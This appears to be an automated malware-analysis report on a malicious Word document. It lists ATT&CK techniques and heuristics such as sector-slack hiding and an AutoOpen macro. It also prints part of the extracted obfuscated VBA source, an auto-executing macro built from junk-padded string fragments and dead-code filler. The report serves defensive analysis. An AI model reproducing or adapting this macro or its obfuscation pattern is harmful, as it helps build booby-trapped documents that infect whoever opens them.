Verdict: MALICIOUS
Risk Score: 122

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The VBA macro code is heavily obfuscated and truncated, making it difficult to determine its exact functionality. However, the presence of AutoOpen and the obfuscation suggest it's designed to download and execute a secondary payload. The large slack space in the OLE structure is also a common characteristic of packed or obfuscated malware.
Heuristics (5)
- OLE document has large unaccounted-for region (severity: high, OLE_SLACK_ANOMALY): OLE file is 123,904 bytes but its declared streams total only 32,709 bytes — 91,195 bytes (74%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (severity: medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code.
- AutoOpen macro (severity: high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (severity: medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (severity: info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16184 bytes |

SHA-256: 15962c186256d5b3d834eaeaf05ae61b0f0379e5698080c84d439eedd554ce97
Preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "rdAMzIN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If Plfiw <= wdvCo Then
Dim GiMTs()
MzuYB = WubjbY + NATMU
srLPzr = WMhfrX + ACpGq + jHEzRC + CaVnW
End If
If AIBiwj Xor dKMwp Then
Dim LALKM()
jGknO = vTvvqu + zqMsB
End If
If hCwrB >= 12 Then
Dim zMCPLb()
IaPUm = BMHiTS + qNzHKD + LBDnw + VzHtj
TIqPwX = WIzaU + ZOljMu + HYpGX + YZPDFN
End If
vzjUjjQMk (jdCTbnii + YkliiRj + cOLiRU + tpiJM + DENjuDmDDOz + BrLNkE + PbsCK + TUbXOc + AhsUGCbYluO + htszuQ + izzCjvhu + iKWwjOu)
If XuSjsU Or 19 Then
Dim pHEsNT()
akllKK = adbfp + BafpK + aQELP + hkGZq
End If
If OVwOz Or 14 Then
Dim kpSwRr()
DDzOc = hztYV + WjcZC + mFRav + LhNZY
TmULC = nrzcoP + zaqbw + PPwfl + cIsCuA
End If
End Sub
Attribute VB_Name = "lEjDKdzmKCK"
Function jdCTbnii()
If mVvEu Or PcqSWz Then
Dim MSKCG()
fMQnX = WKVWW + slwlcD
End If
If sHYjH >= NNaCq Then
Dim aaipW()
YzYbuG = oiOSb + GDuRYo
jQrJkS = SDSCHO + iAnRMR
End If
If OdBpCc > rWlLN Then
Dim aRQZiw()
tjGAT = zzOjQJ + MpCOn + ATzzq + cKdzw
zzDFi = BWadN + mVBGjk
End If
mPszlFZ = "`ja ,S[7[L,@ [p[" + "b[q [i[t[a:[X0[J[ [Q" + "[{K[ [F[4[H[" + " " + """" + "[g[>[ [B[T" + "&[ [n[N@[ [v" + """" + "[5[ ][x"
If QXiLv > UDKZO Then
Dim JLsCi()
zEciFa = BmVSQ + LbAlC
End If
If wuzNkA = IKAmBI Then
Dim PrcbA()
MMLMtb = HzLWX + osOkE + SYJsGc + WsXajq
iQmin = IwXIw + OoUOAG
End If
If bOdNNX >= 1 Then
Dim UQtGBw()
IfLzqF = Nbfww + hinLLR + cWJdR + qUIjor
aDbOXn = aNnwQP + tqdhvj + DmVhhq + pErqE
End If
If tSDfNW = nEapZD Then
Dim lNioPC()
knrfX = pZcvs + GMGaWd
End If
If zwMHu > IQwzuw Then
Dim qjjjm()
DruSw = uEDqJZ + FZdBrU + OSDCnb + FibvQ
End If
If iMCTEj Eqv 16 Then
Dim FKjZcj()
iXFjz = mWAAuc + GCdXU + JdVNS + EUDloj
zCKwI = JmuLM + ZbVtD + LFQXiI + nBtRj
End If
WRWkiF = "[F[ [b[Q[j[" + " [7i[*[ [#[T[L [" + "b[N[2[ [-[W[*[ [w[i[" + "j [_[t[J [9[fS" + "[ [r[;[G[ {[x[<[" + "z[3[$[;[z[p[2[{xM[a"
rWWjiZI = "[\[e[8[R[9`[l[#[Qq[c" + "B[z[^[y[{[U`K[y" + "[?[z[^w[#[" + "8&[ [B[h[X[j[x[^["
jdCTbnii = mPszlFZ + WRWkiF + rWWjiZI
If DYoXZr Or iKNCZ Then
Dim ifCtIw()
RFjpw = kJvIMu + PmEsX + opDLU + RRLZpz
WzMwsz = vGFnCA + UhraJ
End If
If czzlrn >= bEkakQ Then
Dim mEkfE()
izNjR = mjFRkP + QjUBT + BMHclG + VZdaR
LYEckO = JBCWn + LiAbSC
End If
If KhNtLK = LYjGLP Then
Dim EDoMt()
OhjQIT = wkUzf + zMSzEj + vjhWhr + kPiCOQ
End If
End Function
Function YkliiRj()
OwnwS = "Xd[Rb[)[U[6oD" + "[\[E[_8[<[3[" + "8[P[X/[QT[f" + "[y[p[9[P[D@[Y[>[![!" + "['[][G[ U[I@[" + "j[E[>s[b[E[X[j[q["
If oWXbc Or NMDfz Then
Dim DcLHk()
zfzKlp = uYUzKX + sIkhF + lIwow + nzIFoU
End If
If lhdIzV Xor 11 Then
Dim kGLNBZ()
VLWvI = KoGsT + Cropj + MVcdo + PEwILi
End If
If RKEil <> phmsPs Then
Dim zJvsi()
bBrjK = uCpmS + ddIihE
wYTDW = ZFjon + NKSGN + btSqfz + TMlPzQ
End If
zrJZHMKfw = "+[j[V[F[H[N[![*p[" + "$S[bS[e7[h[![B[t" + "[l[m[?,sKu[2k[#[/[V" + "F[W[:_[8&)[w&[m[B["
ZdlAHW = "X[Q[6[8[+[p[X[:[V@[v" + "[V[B! [l[?[" + " [XR[I[)[A@[t[R[" + "T[Q[{o[T" + """" + "[7[m[]" + """" + "["
nHjVW = "-[![j[Z[+%[?3[R[b[" + "m[J[f[i[I[{[;[f[e[" + "0[pC" + """" + "[X[8[" + "a[A[2O[^[g@[r[l" + "[bS[A[i[e["
If OrZtE <> Vjzbl Then
Dim pSnwRb()
pEcsXY = DKBcbb + noAOw + OqoiBD + amIMu
aIQlw = UYELi + zJSBi
End If
If UvbwPw <= UOFRBp Then
Dim YAMXCB()
cHKfK = BtrYH + iZHzK
nIhFT = JombIG + clUsoR + FooaX + JjLIRB
End If
aDKWp = "N[Gk" + """" + "+[f[t[L[f?[" + "l[M&[X[A[_[8%[+[5" + "[n[H[n[;[x[P[c[" + "\[7[m[g[D[_[" + "W[![f[v[y[x,s[*"
YkliiRj = OwnwS + zrJZHMKfw + ZdlAHW + nHjVW + aDKWp
If tfWoW < VXakk Then
Dim fjJhSh()
wzTGhm = cddKGE + NspVA
End If
If kQOqml And zBbwUK Then
Dim PZYpB()
srtPdj = SqULSm + LiEQuA
fbCMmt = zSQjwB + sWzMG + MGhPfh + NjUIu
End
```

... (truncated)